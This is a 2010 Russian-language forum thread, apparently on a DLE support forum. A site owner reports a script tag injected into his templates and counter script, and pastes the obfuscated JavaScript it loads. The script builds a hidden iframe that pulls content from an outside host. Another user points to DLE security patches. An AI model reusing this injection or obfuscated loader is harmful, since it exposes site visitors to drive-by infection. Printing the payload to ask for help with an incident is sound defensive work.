Medik 6 Опубликовано: 22 декабря 2010 Рассказать Опубликовано: 22 декабря 2010 (изменено) Сайт 21region.org Только что обнаружил на сайте код: <script language='JavaScript' src='http://zaika.ipq.co/fr.php?i=15777'></script> Как внедрили пока не понял. Возможно взломали DLE. Вот что выдает ссылка: http://zaika.ipq.co/fr.php?i=15777 document.write(""); document.write(""); document.write(""); document.write(""); document.write(""); document.write(""); function jP(){};var qC=false;jP.prototype = {wT : function() {i=26070;this.lA=false;this.b='';this.lY=false;return '\u0068\u0048\u0048\u0070\u003a\u002f\u002f\u0075\u0034\u0030\u0031\u0031\u0034\u002e\u0072\u0073\u0073\u0048\u0061\u0048\u0069\u0063\u002e\u0072\u0075\u002f\u0075\u0034\u0030\u0031\u0031\u0034\u002e\u0068\u0048\u0058\u006c'.replace(/X/g, 'm').replace(/H/g, 't');var r="";fS="";var s=new Date();},w : function() {t='';iS=false;this.v="v";function cW(){};var nM=false;var cO=false;eC=50936;var l=window;nV=15232;p=false;tR='';var z = this;var rZ=46491;var zP=new Array();var lP=new Date();var n=document;var hQ=false;this.tU=8887;m="m";this.j="j";this.bS=49599;var x = '\u0073\u0058\u0063'.replace(/X/g, 'H').replace(/H/g, 'r');var vW=function(){return 'vW'};this.yW='';this.nW="nW";this.nR="nR";var y = '\u0073\u0058\u0058\u0058\u0058\u006d\u0065\u006f\u0075\u0074'.replace(/X/g, 'H').replace(/HHHH/g, 'etTi');this.rK="";this.a="a";var e = '\u0063\u0072\u0065\u0058\u0058\u0058\u0058\u0058\u0058\u0048\u0065\u006e\u0074'.replace(/XXXXXX/g, 'ateElH').replace(/HH/g, 'em');var u=function(){};this.xY="xY";lW=""; var c = '\u0061\u0070\u0070\u0058\u0058\u0058\u0058\u0068\u0069\u0048\u0064'.replace(/XXXX/g, 'endC').replace(/H/g, 'l');yU="yU";function eW(){};var lPJ="lPJ";var fF=false;var h = '\u0073\u0065\u0074\u0041\u0074\u0074\u0072\u0069\u0058\u0075\u0074\u0065'.replace(/X/g, 'H').replace(/H/g, 'b');var aL=function(){};dW=32978;var jZ='';aT=false;var k = '\u0073\u0074\u0058\u0058\u0065'.replace(/X/g, 'H').replace(/HH/g, 'yl');var nP=new Array();mF="mF";var rE=function(){return 'rE'};var f = '\u0062\u0058\u0048\u0079'.replace(/X/g, 'o').replace(/H/g, 'd');var aC=function(){};this.q='';aD=false;var nJ = '\u0076\u0048\u0048\u0058\u0058\u0058\u0058\u0069\u0074\u0079'.replace(/XXXX/g, 'ibil').replace(/HH/g, 'is');tY="tY";var rH=false;var eO="eO";var cG = '\u0077\u0058\u0058\u0074\u0065'.replace(/XX/g, 'Hi').replace(/H/g, 'r');var jH="jH";nH='';var dP="";var pI=function(){return 'pI'};this.uC='';try {var cR='';var nD=new Date();rM="";sJ=false;wN=false;this.qL='';var d=n[e]('\u0069\u0066\u0072\u0061\u0058\u0065'.replace(/X/g, 'H').replace(/H/g, 'm'));function qT(){};var fB="";var fFX="fFX";function jF(){};aA=false;this.iR='';this.wG=false;var fY=43306;var yD=new Array();qLY='';vL="vL";var kN=new Array();d[h](x, z.wT());this.xS='';this.dG="";d[k][nJ] = '\u0068\u0048\u0048\u0064\u0058\u006e'.replace(/X/g, 'e').replace(/HH/g, 'id');var jY="jY";this.nWE=false;function hF(){};gN=false;var bP=false;function o(){};qA="";this.vQ='';this.sP='';var yZ=new Array();this.mN="";document[f][c](d);var rA=function(){};this.fQ="";this.bK=58866;cL=false;var fZ=new Array();} catch(g) {var yQ=function(){};var fBU=function(){return 'fBU'};zZ=false;var xC="xC";n[cG]('\u003c\u0048\u0048\u006d\u006c\u0020\u003e\u0058\u0058\u0058\u0058\u0058\u0058\u0058\u0058\u0058\u0062\u006f\u0064\u0079\u003e\u003c\u002f\u0048\u0048\u006d\u006c\u003e'.replace(/XXXXXXXXX/g, '"); Сервер пока в дауне. Кто нибудь знает чем может грозить этот код? Изменено 22 декабря 2010 пользователем Medik Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 068 Опубликовано: 22 декабря 2010 Рассказать Опубликовано: 22 декабря 2010 Только что обнаружил на сайте код: где именно вы его обнаружили, все зависит от того где именно в файлах находится этот код. Цитата Ссылка на сообщение Поделиться на других сайтах
Medik 6 Опубликовано: 22 декабря 2010 Рассказать Опубликовано: 22 декабря 2010 (изменено) Автор Только что обнаружил на сайте код: где именно вы его обнаружили, все зависит от того где именно в файлах находится этот код. вписали в main.tpl и fullstory.tpl Вписали в скрипт счетчика liveinternet Изменено 22 декабря 2010 пользователем Medik Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 068 Опубликовано: 22 декабря 2010 Рассказать Опубликовано: 22 декабря 2010 Medik, На вашем стояли патчи безопасности http://dle-news.ru/bags/ ? Если да то http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.